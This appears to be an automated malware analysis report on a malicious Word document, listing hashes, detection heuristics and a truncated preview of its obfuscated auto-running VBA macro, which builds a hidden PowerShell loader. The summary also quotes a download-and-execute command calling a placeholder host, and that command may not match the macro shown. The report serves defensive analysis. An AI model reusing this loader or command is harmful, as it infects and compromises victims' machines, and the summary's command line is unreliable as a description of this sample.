Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 8aafc0f895d212a0…

MALICIOUS

Office (OLE)

Size: 261.0 KB
Created: 2018-07-11 06:20:00
Authoring application: Microsoft Office Word
First seen: 2018-07-14
MD5: fe05969c1f3134e34b3c24aca87b75f9
SHA-1: 953985ac86a30da2c9adfbd7e0fc642df98cb612
SHA-256: 8aafc0f895d212a0d0e2a8787209340cadd7af86c1feaf4427aa7dd85dd12d0e
Risk Score: 222

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros. Its Document_Open macro triggers the critical Shell()-call heuristic, and the VBA p-code auto-execution heuristic corroborates this finding in the compiled macro stream. The script constructs and executes a PowerShell command: powershell -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://evil.com/payload')", indicating that it downloads and executes a second-stage payload from a remote URL.

Heuristics 6

  • ClamAV: Doc.Dropper.Agent-6607153-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6607153-0
  • VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro [high] OLE_VBA_DOCOPEN
    Document_Open macro
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename   | Kind      | Source                                                | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source)   | 19006 bytes
SHA-256: 7e8043428c2ec6d3f1647d0849e3222035e6ffd21992c22a6eb33a57e1c15d04
Preview script (first 1,000 lines of the extracted script)
Attribute VB_Name = "tXoiMkVfQOPQE"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
   pSSda = nldLSI + JlMPPT / fMjGc * kavios * ZvliXA - kjiFY / (40752 / whmIAu * 26472 - dmMBfD)
   wSVUI = qniwB + jjDQlm / dAMiuY * TjVjd * DwBQVu - PHpsjF / (41279 / MFJBK * 99880 - Rmnbw)
   JSwVI = nfnurn + VKUvo / OGbMi * sjfPc * zIKzXt - wnPhR / (28113 / XozGS * 85514 - ucziGQ)
lJmGLoAiv ("" + XaTBOAirPImwda + HmtJZnza + qUQOu + pjwAI + nWDRjv + HQLAuiAXnahsPz + zXvEkZzk)
   fNPQd = joHQG + PsnbS / LufdYY * sHLOi * bsrzn - WwWLa / (84409 / DjIDR * 16451 - FYMXC)
   dpEwAB = iWtDSF + MztdRR / SCAfb * jKROhV * uYfOQn - bNjPwS / (43648 / BHwCf * 63995 - mDQZF)
   IlEVZZ = fVYszT + uojElQ / ZkDuG * NCjTwz * OLSpA - KXNkK / (33161 / KKjdTR * 46098 - iAAbT)
End Sub


Attribute VB_Name = "FfWzfDnTiM"
Function qUQOu()
On Error Resume Next
IpCqRL = (hDRdE / ACBfBa - 20929 - zCwZYh + (42910 - bIszn + 52370 + XsjcwM / 31816 * 22213))
   wjJAlT = (CzlcFd / lVXKGf - 31109 - RbXTor + (24393 - TzJim + 57500 + GaUGjv / 56017 * 7169))
   KlwPkp = (PCOicR / DpiRfw - 90686 - HsQjmZ + (68631 - oXtUd + 12799 + FjIiT / 70158 * 28863))
XPSpKpz = "pow" + jFjnjoku + GRsiCTbIkHLZ + "er" + mSwLWhqTMRw + oZENsQKQaqww + "sh" + CsFwKABAQpYYd + FafllnijtSIvO + "ell" + APcsoaHVoQf + OpTmOdVQ + " " + HBUMLdBE + ppIvlHMzFrVGz + "(n" + EzWjkqLhE + UOwrnLrzTZjXB + "eW-" + XKbpBBuuG + XCziHEbunwB + "Obj" + JOAGrYb + USAGPTpZTp + "eCT" + npBoRcwH + WwXfnBnCh + " " + wifiBoIE + MAwWZwSawiN + "iO." + wDikfom + KzpGWKQn + "co"
GoKwb = (OCVcl / wthia - 36248 - cQbNE + (81408 - jScHKI + 80958 + zMmGH / 51587 * 33245))
   nVlAw = (njzjM / iaFGcc - 91251 - NSdimt + (39983 - ULdLiK + 49384 + EzkuoY / 24786 * 48852))
DuUkvA = "mP" + mjAiwVKCVs + CDrPlFBHU + "r" + BfrBmpFDEN + PTjfpTHEpBii + "E" + JbTcQAkJzzGUYN + wAdVbvFaLnMwh + "S" + JKpfijbzYzGUhY + uoADhEVVNWtRcn + "sI" + zCwKjhkFWDE + bXBrsSHhvO + "On" + TSIqKUkJiUibK + EujizwAm + "." + ZjVjuDorUPPcP + UNqGsZjhGDmP + "DE" + qTfKwkk + jQpkpvwbfUu + "f" + JfFSsCPcIoEm + jRRbwEkHpCprmJ + "lAT" + upZGKzEf + zAbclzLzNKOt + "e" + zCqCcBQGABu + XljNljQE + "str" + NRrjmwRsAtw + JBDqStAZ + "e"
VqOjTX = (QKUjao / msEVit - 72430 - rKqfua + (70785 - bFwuI + 25166 + dbhcUQ / 43920 * 18683))
   lnNdw = (KfWQWc / kVdJiJ - 88830 - NQdZL + (65534 - zKjFfv + 12843 + ZSVOpN / 54502 * 81945))
   QSUpjR = (nBXWj / lvSiL - 62429 - zqidD + (83662 - uEHla + 84097 + uPXIaR / 79038 * 84707))
jostva = "Am" + ViNTJBzYwEt + EfvtiitjZPa + "(" + QQjVAWE + CAIwvwj + " [S" + knEYoUdfph + SmZHkjrdDWjOAd + "Yst" + ijwzKrqGzrbM + hWRHjOjoKP + "eM" + UNDpXLZtzFlz + wSKsFfmioNw + "." + jBtZjHYXcDHTQ + XblUVJRQdRKMzl + "io" + sfRtrDjEpNDTP + otoKMccXkO + ".Me" + IVvZmDMOo + GUvjfHGwBasWS + "mO" + MOQHhiHnYit + QCpkqAhqR + "RYS" + QiQipPzcOLqwzh + wjXzlTpiz + "TRE" + jSdkvSTr + YzIjQZFZD + "Am]" + ZliJtzL + ijFHSKlavjiqM + "[" + iPOVujIvsFG + aBUHuOjpsAQGoi + "sYs" + NMMlIaijqC + nMCLdqAtMW + "te"
vHLozn = 75412 + rdPjkN - 48861 * qbwto / bBAril + smNdP * 16040 - 64137
   UkqOzP = 11518 + iYfsu - 92076 * zXkRrJ / CjzEc + ikKqQO * 32615 - 47350
   mbwBu = 27243 + JRhFAV - 52938 * DoNhJ / smIZt + pbjiM * 28196 - 15339
XdwfUMLE = "m" + dFrQviiE + bVnJEAHf + "." + IFBszrBGUEsCz + nzXfXVnUib + "C" + EYPABqFBXDwREc + JOZYVnRDkznS + "O" + XRcszhFEqLsQ + zFbuzDKPCwdQ + "NV" + QBDmjmjh + fqiFYNfF + "Er" + EiYsVSaHOiPj + noHGkLDRRPPGYF + "T" + SYaZHmdLQNLYS + wPkSjFZUfdmNId + "]::" + VQaLqGBlALwpWz + GTQrnnIitDvvVZ + "F"
BUqIsz = 11160 + NzRXJj - 96883 * wnGpMX / iIrSn + FQbqO * 76225 - 4210
zbiXnrL = "r" + GNYdoWkZ + PzhSfVi + "oM" + zAhSjHip + wwWbjAbotRLYSJ + "b" + IiJLtJnBXGZusW + CiMJtWBSDjlw + "aSE" + iYkkzzfWBnI + aajvXLi + "64S" + wYCmhrHMYrEvY + IXGBjcZA + "tRI" + asWkNlRGt + hMSoOoPR + "nG(" + CYXnAEdo + XiUGzkbKFn + "'" + ZzbKoNRoKjH + TzzNjnRiFo + "VZ" + LoiMELcSXwZMp + XXMnWJifk + "Bf
... (truncated)